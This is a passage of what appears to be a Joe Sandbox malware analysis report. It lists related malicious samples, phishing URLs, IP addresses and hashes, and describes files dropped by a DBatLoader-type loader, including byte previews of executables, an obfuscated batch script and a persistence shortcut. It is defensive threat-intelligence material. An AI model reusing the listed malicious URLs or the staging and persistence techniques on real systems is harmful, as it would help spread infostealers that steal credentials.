	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	51.195.88.199
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
	RFQ -PO.20571-0001-QBMS-PRQ-0200140.js	Get hash	malicious	AgentTesla, RedLine	Browse	51.195.88.199
	ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	51.195.88.199
api.ipify.org	Swift Copy.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	Pago por adelantado_ USD 72000 (50%).exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SWIFTCOPY202973783.vbe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	Creal.exe	Get hash	malicious	Creal Stealer	Browse	104.26.13.205
	#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe	Get hash	malicious	Blank Grabber, Creal Stealer	Browse	104.26.12.205
	ypauPrrA08.exe	Get hash	malicious	Ades Stealer, BlackGuard, VEGA Stealer	Browse	104.26.13.205
	Sara.exe.bin.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	Sara.exe.bin.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	6G1YhrEmQu.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
gxe0.com	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
pywolwnvd.biz	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	54.244.188.177
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
	SetupRST.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	nL0Vxav3OB.exe	Get hash	malicious	Remcos	Browse	54.244.188.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://fnv.morsentutra.ru/DD8Q/	Get hash	malicious	Unknown	Browse	172.67.147.7
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	188.114.96.3
	https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fthedailyparanoia%2Ecom%2F	Get hash	malicious	HTMLPhisher	Browse	172.67.187.85
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	Swift Copy.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	https://fvggtrgtr57crthrvtrhrh.s3.us-east-2.amazonaws.com/u7yy78ty7t6fg67t676t/hg7g6g6gfvj5rfj/index.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://nwii.me/index-Usaa/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Attachment-914011545-004.pdf	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://klick.publikator.se/?BREV_ID=592&EPOST=kent.isaksson@platspecialisten.se&URL=https://link.mail.tailwindapp.com/c/443/65791c056ee100f6e0b1ce0da6ffd5aaa4304af6d9041064814b00b317faceea	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
HAWKHOSTCA	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	198.252.106.191
	https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46atMmRo3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbmy4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v7LR3jPEjzYXr2LwuykYQnzvV6boWlogU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A	Get hash	malicious	Unknown	Browse	198.252.106.147
	Z6s208B9QX.exe	Get hash	malicious	FormBook	Browse	198.252.106.191
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	198.252.106.191
	PO23100072.exe	Get hash	malicious	FormBook	Browse	198.252.106.191
OVHFR	https://klick.publikator.se/?BREV_ID=592&EPOST=kent.isaksson@platspecialisten.se&URL=https://link.mail.tailwindapp.com/c/443/65791c056ee100f6e0b1ce0da6ffd5aaa4304af6d9041064814b00b317faceea	Get hash	malicious	HTMLPhisher	Browse	192.99.218.232
	RFQ_TFS-1508-AL NASR ENGINEERING.exe	Get hash	malicious	RedLine	Browse	193.70.111.186
	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	37.187.76.119
	5r3fqt67ew531has4231.spc.elf	Get hash	malicious	Mirai, Okiru	Browse	178.32.95.230
	Cursor Commander.exe	Get hash	malicious	Unknown	Browse	51.89.9.252
	6uqT7ARJKQ.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	139.99.3.47
	WMdKM7E5Yg.exe	Get hash	malicious	Quasar	Browse	147.135.36.89
	https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18	Get hash	malicious	LiteHTTP Bot	Browse	54.38.113.4
	FcRCSylOMs.exe	Get hash	malicious	FormBook, GuLoader	Browse	5.39.10.93
	Y725GT96z1.exe	Get hash	malicious	FormBook, GuLoader	Browse	94.23.162.163

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SSA-Statement.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.26.12.205
	Swift Copy.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	11315781264#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.26.12.205
	Pago por adelantado_ USD 72000 (50%).exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Factura Honorarios 2024-11-04.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.12.205
	CERTIFICADO TITULARIDAD.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.26.12.205
	SWIFTCOPY202973783.vbe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Quotation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.26.12.205
	https://t.ly/RpFMV	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.26.12.205
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	198.252.105.91

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\lxsyrsiW.pif	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse
	r876789878767.cmd	Get hash	malicious	DBatLoader, FormBook	Browse
	2tKeEoCCCw.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse
	z1Transaction_ID_REF2418_cmd.bat	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	z1SWIFT_MT103_Payment_552016_cmd.bat	Get hash	malicious	DBatLoader, FormBook	Browse
	Order Specifications for Materials.docx.vbs	Get hash	malicious	DBatLoader, FormBook	Browse
	Payment.cmd	Get hash	malicious	Azorult, DBatLoader	Browse

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.277751032999737
Encrypted:	false
SSDEEP:	12288:mImGUcsvZZdubv7hfl3+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlOsqjnhMgeiCl7G0nehbGZpbD
MD5:	052FDC7E9B1B11AC964325E136435F02
SHA1:	3651B9D54DBB0393F5FA095C5BADB342CE55BB07
SHA-256:	7B57FD9ED6D389B1B970402796F6773DD91FEA1EC74E69E534674DB5B21F73B8
SHA-512:	2911FA7CCA634C9F0632E5FB7B3904186CD3E10E3CD507F63D0D540F9D384FAD18CF5C283ADA9AEFE370CFCC1A4F0A15FA847816EBA3F729FC1BC1ABBE727568
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Users\Public\Libraries\PNO

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Av:Av
MD5:	0D25C4052914983B893AFA9B1C3141D2
SHA1:	E75F05ECD4701EB25EFB7947FD5FCF8376FBFF9D
SHA-256:	B3E58B2A0ADD30249EFE38CFE9955D765D8A0A882B239ED208F16E38DB62A00C
SHA-512:	7ECE025E27544CA3EA68EBB8E437B500D434E5522BD0393994CDD081D9AC5CCF86DADACB955BE2C981D9102055ACADE5DD644ECD98C9E931F26572E4F237F8BA
Malicious:	false
Preview:	88..

C:\Users\Public\Libraries\Wisrysxl

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	data
Category:	dropped
Size (bytes):	1921890
Entropy (8bit):	7.398856770638502
Encrypted:	false
SSDEEP:	49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
MD5:	34E82F30B12F324DB1D2604CFA91CBB2
SHA1:	20001D49CD86B776EE8072A07F536B7330A77F97
SHA-256:	F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
SHA-512:	47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
Malicious:	true
Preview:	...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.

C:\Users\Public\Libraries\Wisrysxl.PIF

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1056768
Entropy (8bit):	6.917170198806807
Encrypted:	false
SSDEEP:	24576:/GBqWzMJ3rInJFhR1T6a3R6ZFlR+gKT44VoIOL7zk:/CHnca8YL6L
MD5:	BDC3B662D1136F20F51F55A0F6A2FB9D
SHA1:	EF8BAAD4F0F3F96E2D04F3C6CEA1471BCD651008
SHA-256:	23B47A050614D71D7081F8E0313C972E9E6B1DF6C9EEC10F59B6EE06D0506EC9
SHA-512:	29036CED934C7668B072C811285761A2B4CDD562B2D269E50BE767E8BE27589117E84BF0F34B0323912A3DEA4545DAB9B9E5A6046C8BEB36D15EF65056A88AD8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................:......\.............@..............................................@...........................`...%... ..........................Tj...................................................f...............................text............................... ..`.itext.............................. ..`.data...H...........................@....bss.....6... ...........................idata...%...`...&..................@....tls....4...............................rdata...............*..............@..@.reloc..Tj.......l...,..............@..B.rsrc........ ......................@..@..................... ..............@..@................................................................................................

C:\Users\Public\Libraries\lxsyrsiW.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:	dropped
Size (bytes):	62357
Entropy (8bit):	4.705712327109906
Encrypted:	false
SSDEEP:	768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:	B87F096CBC25570329E2BB59FEE57580
SHA1:	D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:	72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:	false
Preview:	@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

C:\Users\Public\Libraries\lxsyrsiW.pif

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.328046551801531
Encrypted:	false
SSDEEP:	1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:	C116D3604CEAFE7057D77FF27552C215
SHA1:	452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:	9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse Filename: NEOMS_EOI_FORM.GZ, Detection: malicious, Browse Filename: r876789878767.cmd, Detection: malicious, Browse Filename: 2tKeEoCCCw.exe, Detection: malicious, Browse Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse Filename: E_dekont.cmd, Detection: malicious, Browse Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious, Browse Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious, Browse Filename: Order Specifications for Materials.docx.vbs, Detection: malicious, Browse Filename: Payment.cmd, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

C:\Users\Public\Wisrysxl.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.094576921115185
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxXSjA+ov:HRYFVmTWDyzPtZExC8+y
MD5:	CC20459CE5C31054021AE4128AECBC73
SHA1:	F19D8064095980B32DB86CD0F079BE9D5D24AF37
SHA-256:	1E16EA7CECB7DF03A105C406FF7043EE35481E2EB7453FBC597DFAB67E06B7D9
SHA-512:	143F54820BC9F6BE7D50D683A693163C3CAACCCDB97162050FAD880DC50033482CF08E420FBC5960E27577173E81DDCEE2A440455D88F6484C3C8FA62F832109
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=935796..HotKey=87..

C:\Users\Public\alpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	236544
Entropy (8bit):	6.4416694948877025
Encrypted:	false
SSDEEP:	6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:	4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:	80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\xpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.742964649637377
Encrypted:	false
SSDEEP:	384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
MD5:	B3624DD758CCECF93A1226CEF252CA12
SHA1:	FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
SHA-256:	4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
SHA-512:	C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z.....................2......P4.......@....@..................................c....@...... ..........................`a..\|....p.. ...............................T............................................`..\............................text....)......................... ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379184608538005
Encrypted:	false
SSDEEP:	48:bWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPlyus:bLHyIFKL3IZ2KRH9Ougws
MD5:	5C7E537A8382F2DE0FC0A560E686028F
SHA1:	36DCD7B4471FEC414AF98E3B5E6F0051C74556F4
SHA-256:	4E0AAE659414F24EEC6675C8EA7490DEA7B410F2D55DF551779A1157035D3992
SHA-512:	DFCFAF05AB08BD29B6747E0FACDDFAEF0E9539DA456F09809DEA2E813DC4808A3FAF895C24F4CB5A0C6E974B86778D79D945A9A204830C5D07D829DBBEE23475
Malicious:	false
Preview:	@...e.................................&..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxath24z.vkb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqqrlem0.4qg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ub00yyfn.2oc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
